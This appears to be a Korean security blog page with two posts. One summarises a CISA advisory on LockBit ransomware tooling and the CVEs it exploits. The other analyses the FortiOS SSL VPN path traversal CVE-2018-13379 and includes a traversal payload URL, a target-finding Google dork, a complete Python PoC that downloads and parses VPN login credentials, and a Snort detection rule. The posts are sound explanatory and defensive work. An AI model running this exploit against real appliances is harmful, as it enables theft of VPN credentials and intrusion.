'CVE-2018-13379' 태그의 글 목록

CVE-2018-13379

LockBit 랜섬웨어 동향 2023.06.16
FortiOS SSL VPN Directory Traversal 취약점 (CVE-2018-13379) 2022.11.29

LockBit 랜섬웨어 동향

2023. 6. 16. 22:13

1. 개요

- 미국 CISA, FBI, MS-ISAC와 여러 국가의 사이버 보안 그룹이 LockBit 랜섬웨어 관련 분석 및 보안권고 발표

- 공격자는 LockBit을 사용해 다양한 주요 인프라 분야를 지속적으로 공격

> 금융, 식품 및 농업, 교육, 에너지, 정부 및 응급 서비스, 의료, 제조 및 운송 등

> 20년 이후 약 1,700건의 공격 시도, 69건의 침해사고, 1,653명의 피해 확인

- 변종을 개발하여 고도화하고, RaaS(Ransomware-as-a-Service)를 지원해 랜섬웨어 배포

> 20년 이후 72건의 변종 발견

2. 주요내용

- 내부망 침입을 위해 합법적인 사용을 목적으로 하는 여러 프리웨어 및 오픈 소스 도구 활용

> 용도를 변경하여 네트워크 정찰, 원격 액세스 및 터널링, 자격 증명 덤프, 파일 유출 등에 악용

구분	도구명	사용 목적	LockBit 그룹 사용 목적
정보수집	AdFind	AD(Active Directory)를 검색 및 정보 수집	AD 정보를 수집하여 권한 확대 및 네트워크 이동
	Advanced Internet Protocol (IP) Scanner	네트워크 스캔 후 네트워크 장치 표시	잠재적인 액세스 벡터를 식별하기 위해 피해자의 네트워크를 매핑
	Advanced Port Scanner	네트워크 스캔	공격에 사용할 TCP/UDP 포트 검색
	Bloodhound	공격 경로 관리를 위한 AD 정찰을 수행	네트워크 액세스 권한을 얻기 위해 악용될 수 있는 AD 관계를 식별
	Seatbelt	여러 보안 지향 검사 수행	보안 지향 검사 수행해 시스템 정보 나열
	SoftPerfect Network Scanner	시스템 관리를 위해 네트워크 스캔을 수행	시스템 및 네트워크 정보 획득
원격접근	AnyDesk	원격 접속 프로그램	네트워크 장치 원격 제어
	Atera Remote Monitoring & Management (RMM)	네트워크 장치에 대한 원격 연결 활성화 네트워크 장치 원격 제어	네트워크 장치 원격 제어
	Ligolo	펜 테스트를 위해 SOCKS5 또는 TCP 터널을 역방향 연결에서 설정	역방향 터널링을 통해 피해자 네트워크 내의 시스템에 연결
	Ngrok	인터넷을 통한 터널링을 통해 로컬 웹 서버에 원격 접근	인터넷을 통해 시스템에 터널링하여 네트워크 보호를 우회
	ScreenConnect (또는 ConnectWise)	네트워크 장치에 대한 원격 연결 활성화	시스템 원격 연결
	Splashtop	네트워크 장치에 대한 원격 연결 활성화	시스템 원격 연결
	TeamViewer	네트워크 장치에 대한 원격 연결 활성화	시스템 원격 연결
	ThunderShell	HTTP 요청을 통한 원격 액세스	네트워크 트래픽을 암호화하면서 원격으로 시스템 접근
자격 증명 정보 수집	ExtPassword	Windows 시스템에서 암호 복구	네트워크 액세스 및 자격 증명 획득
	LaZagne	여러 플랫폼에서 시스템 암호를 복구	시스템 및 네트워크 액세스를 위한 자격 증명 수집
	LostMyPassword	Windows 시스템 암호 복구	네트워크 액세스 및 자격 증명 수집
	Microsoft Sysinternals ProcDump	중앙 처리 장치(CPU) 스파이크에 대한 애플리케이션을 모니터링하고 스파이크 중에 크래시 덤프를 생성	LSASS(Local Security Authority Subsystem Service)의 콘텐츠를 덤프하여 자격 증명 획득
	Mimikatz	시스템에서 자격 증명 추출	네트워크 액세스 권한을 얻고 시스템을 악용하기 위해 자격 증명 추출
	PasswordFox	Firefox 브라우저 암호 복구	네트워크 액세스 및 자격 증명 수집
권한 상승	AdvancedRun	다른 설정으로 소프트웨어 실행	소프트웨어 실행 전 설정 변경을 통해 권한 상승 활성화
네트워크 이동	Impacket	네트워크 프로토콜 작업을 위한 Python 클래스 모음	네트워크 이동 활성화
공격 파일 유포	Chocolatey	Microsoft Windows에서 명령줄 패키지 관리	LockBit 그룹 도구 설치에 활용
시스템제어	Microsoft Sysinternals PsExec	원격 시스템에서 명령줄 프로세스를 실행	시스템 제어
탐지우회	7-zip	파일을 아카이브로 압축	유출 전에 감지되지 않도록 데이터 압축
	Backstab	맬웨어 방지 프로그램	EDR로 보호되는 프로세스를 종료
	Bat Armor	PowerShell 스크립트를 사용해 .bat 파일을 생성	PowerShell 실행 정책 우회
	Defender Control	Microsoft Defender를 비활성화	Microsoft Defender 우회
	GMER	루트킷 제거	EDR 소프트웨어 종료하고 제거
	PCHunter	시스템 프로세스 및 커널을 포함한 고급 작업 관리를 활성화	EDR 프로세스 종료 및 우회
	PowerTool	루트킷을 제거하고 커널 구조 수정을 감지, 분석 및 수정	EDR 소프트웨어 종료 및 제거
	Process Hacker	루트킷 제거	EDR 소프트웨어 종료 및 제거
	PuTTY Link (Plink)	Windows SSH(Secure Shell) 작업 자동화	탐지 우회
	TDSSKiller	루트킷 제거	EDR 프로세스 종료 및 제거
데이터 유출	FileZilla	플랫폼 간 파일 전송 프로토콜(FTP)	LockBit 그룹으로 데이터 유출
	FreeFileSync	클라우드 기반 파일 동기화 지원	데이터 유출을 위한 클라우드 기반 파일 동기화
	MEGA Ltd MegaSync	클라우드 기반 파일 동기화 지원	데이터 유출을 위한 클라우드 기반 파일 동기화
	Rclone	클라우드 저장소 파일을 관리	클라우드 스토리지를 통한 데이터 유출
	WinSCP	Microsoft Windows용 SSH 파일 전송 프로토콜을 사용하여 파일 전송	SSH 파일 전송 프로토콜을 통해 데이터 유출

- 기존 RCE 취약점 및 새로운 취약점 악용

구분	CVE	CVSS	설명
신규 취약점	CVE-2023-0669	7.2	Fortra GoAnyhwere Managed File Transfer(MFT) 원격 코드 실행 취약점
신규 취약점	CVE-2023-27350	9.8	PaperCut MF/NG 부적절한 접근 제어 취약점
기존 취약점	CVE-2021-44228	10.0	Apache Log4j2 원격 코드 실행 취약점
	CVE-2021-22986	9.8	F5 BIG-IP 및 BIG-IQ 원격 코드 실행 취약점
	CVE-2020-1472	10.0	NetLogon 권한 상승 취약점
	CVE-2019-0708	9.8	Microsoft 원격 데스크톱 서비스 원격 코드 실행 취약점
	CVE-2018-13379	9.8	Fortinet FortiOS SSL VPN 경로 우회 취약점

3. 권고사항

- 관리자 계정 지속적 모니터링 및 감사

- 원격 접근 방지를 위한 망분리 및 서비스 계정 제한 (권한, 세션 시간 제한 등)

- 확산 방지를 위한 업무별 중요도 파악 및 네트워크 분할

- 탈취 계정 사용 방지를 위한 비밀번호 변경 및 MFA 활성화

- 잘못된 AD 보안 구성이 있는지 지속적 점검

- 교육을 통한 임직원 보안 인식 제고 및 향상

4. 참고

[1] https://www.cisa.gov/news-events/news/us-and-international-partners-release-comprehensive-cyber-advisory-lockbit-ransomware
[2] https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-165a

'랜섬웨어 > 분석' 카테고리의 다른 글

다크파워 (Dark Power) 랜섬웨어 (1)	2023.03.28
ESXiArgs Ransomware (0)	2023.02.15
Masscan 랜섬웨어 (0)	2022.10.12
LockBit 3.0 랜섬웨어 빌더 분석 (1)	2022.10.04

FortiOS SSL VPN Directory Traversal 취약점 (CVE-2018-13379)

2022. 11. 29. 17:45

1. Fortinet SSL VPN

- Fortinet : 보안 솔루션을 개발 및 판매하는 다국적 기업

- SSL VPN : SSL(Secure Socket Layer) 기술을 사용한 VPN 솔루션으로 웹 서버와 클라이언트간의 안전한 통신을 위해 보안을 제공하는 프로토콜

2. 취약점

[사진 1] https://nvd.nist.gov/vuln/detail/CVE-2018-13379

- Fortinet 제품에서 입렵값에 대한 검증을 적절히 수행하지 않아 특정 경로, 파일에 접근 가능한 취약점

- 취약점이 발생하는 제품 및 버전은 다음과 같으며, SSL VPN이 활성화된 경우에만 영향을 받음

제조사	제품	버전
Fortinet	FortiOS	6.0.0 ~ 6.0.4
		5.6.3 ~ 5.6.7
		5.4.6 ~ 5.4.12
	FortiProxy	2.0.0
		1.2.0 ~ 1.2.8
		1.1.0 ~ 1.1.6
		1.0.0 ~ 1.0.7

2.1 분석

- “/remote/fgt_lang?”페이지 호출 시 lang 매개변수의 필터링을 제대로 수행하지 못해 발생하는 취약점

- 공격자는 lang 매개변수에 디렉터리 이동문자 "../"를 이용해 sslvpn_websession 등의 파일에 접근

- sslvpn_websession : 로그인 자격증명이 저장된 파일

Payload : Target IP/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

[사진 1] KISA 2021년 상반기 사이버 위협 동향 보고서.pdf 발췌

- [사진 1]의 요청을 통해 공격자에게 사용자의 ID/Password가 노출되며, 해당 계정정보를 통해 로그인이 가능

[사진 2] sslvpn_websession 파일 내용 노출 (ID/Password 유출)

2.2 PoC

- /remote/fgt_lang 페이지의 lang 매개변수에 ../를 삽입해 특정 경로, 파일 등에 접근

# Exploit Title: Fortinet FortiOS Leak file - Reading login/passwords in clear text.
# Google Dork: intext:"Please Login" inurl:"/remote/login"
# Date: 17/08/2019
# Exploit Author: Carlos E. Vieira
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/fortigate/fortios.html
# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
# Tested on: 5.6.6
# CVE : CVE-2018-13379

# Exploit SSLVPN Fortinet - FortiOs
#!/usr/bin/env python
import requests, sys, time
import urllib3
urllib3.disable_warnings()


def leak(host, port):
	print("[!] Leak information...")
	try:
		url = "https://"+host+":"+port+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
		headers = {"User-Agent": "Mozilla/5.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}		
		r=requests.get(url, headers=headers, verify=False, stream=True)
		img=r.raw.read()
		if "var fgt_lang =" in str(img):
			with open("sslvpn_websession_"+host+".dat", 'w') as f:
				f.write(img)		
			print("[>] Save to file ....")
			parse(host)
			print("\n")
			return True
		else:
			return False
	except requests.exceptions.ConnectionError:
		return False
def is_character_printable(s):
	return all((ord(c) < 127) and (ord(c) >= 32) for c in s)

def is_printable(byte):
	if is_character_printable(byte):
    		return byte
  	else:
    		return '.' 

def read_bytes(host, chunksize=8192):
	print("[>] Read bytes from > " + "sslvpn_websession"+host+".dat")
	with open("sslvpn_websession_"+host+".dat", "rb") as f:
    		while True:
        		chunk = f.read(chunksize)
        		if chunk:
          			for b in chunk:
            				yield b
        		else:
          			break
def parse(host):
    print("[!] Parsing Information...")
    memory_address = 0
    ascii_string = ""
    for byte in read_bytes(host):
    	ascii_string = ascii_string + is_printable(byte)
	if memory_address%61 == 60:
		if ascii_string!=".............................................................":
	    		print ascii_string
	    	ascii_string = ""
	memory_address = memory_address + 1

def check(host, port):
    print("[!] Check vuln...")
    uri = "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
    try:
        r = requests.get("https://" + host + ":" + port + uri, verify=False)
        if(r.status_code == 200):
            return True
        elif(r.status_code == 404):
            return False
        else:
            return False
    except:
        return False
def main(host, port):
    print("[+] Start exploiting....")
    vuln = check(host, port)
    if(vuln):
        print("[+] Target is vulnerable!")
        bin_file = leak(host, port)
    else:
        print("[X] Target not vulnerable.")

if __name__ == "__main__":

    if(len(sys.argv) < 3):
        print("Use: python {} ip/dns port".format(sys.argv[0]))
    else:
        host = sys.argv[1]
        port = sys.argv[2]
        main(host, port)

3. 대응

3.1 서버측면

① 취약점 패치 적용

- Fortinet은 취약점 패치 적용 전까지 SSL-VPN을 사용하지 않을것을 권고

② 비밀번호 변경

- 이미 취약점에 노출되어 계정정보가 유출되었을 가능성이 있으므로 계정정보를 변경

③ MFA 적용

- 계정 외에도 인증할 수 있는 추가 수단을 적용하여 MFA 구현

3.2 네트워크 측면

① 탐지 룰 적용 및 모니터링, 차단

- 공개된 PoC를 통해 /remote/fgt_lang?lang 이하의 URL로 접근이 확인되므로 해당 문자열을 탐지

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"FortiOS SSL VPN Directory Traversal";content:"/remote/fgt_lang?lang";)

4. 참고

- https://www.fortiguard.com/psirt/FG-IR-18-384

- https://www.boho.or.kr/data/secNoticeList.do?page=1&sort_code=&sort_code_name=&search_sort=display_contents&search_word=CVE-2018-13379

- https://krcert.or.kr/data/reportView.do?bulletin_writing_sequence=36146

- https://www.codetd.com/ko/article/7028571

'취약점 > Directory Traversal' 카테고리의 다른 글

Check Point社 VPN Path Traversal 취약점 (CVE-2024-24919) (0)	2024.06.04
Openfire 경로 탐색 취약점 (CVE-2023-32315) (1)	2024.02.02
F5 BIG-IP TMUI RCE (CVE-2020-5902) (0)	2022.12.25
Citrix ADC and Gateway 취약점 (CVE-2019-19781) (0)	2022.12.02
bWAPP Directory Traversal(Files) (0)	2022.08.06

PREV 이전 1 NEXT 다음

꼰머의 보안공부

CVE-2018-13379

LockBit 랜섬웨어 동향

1. 개요

2. 주요내용

3. 권고사항

4. 참고

'랜섬웨어 > 분석' 카테고리의 다른 글

FortiOS SSL VPN Directory Traversal 취약점 (CVE-2018-13379)

1. Fortinet SSL VPN

2. 취약점

2.1 분석

2.2 PoC

3. 대응

3.1 서버측면

3.2 네트워크 측면

4. 참고

'취약점 > Directory Traversal' 카테고리의 다른 글

+ Recent posts

티스토리툴바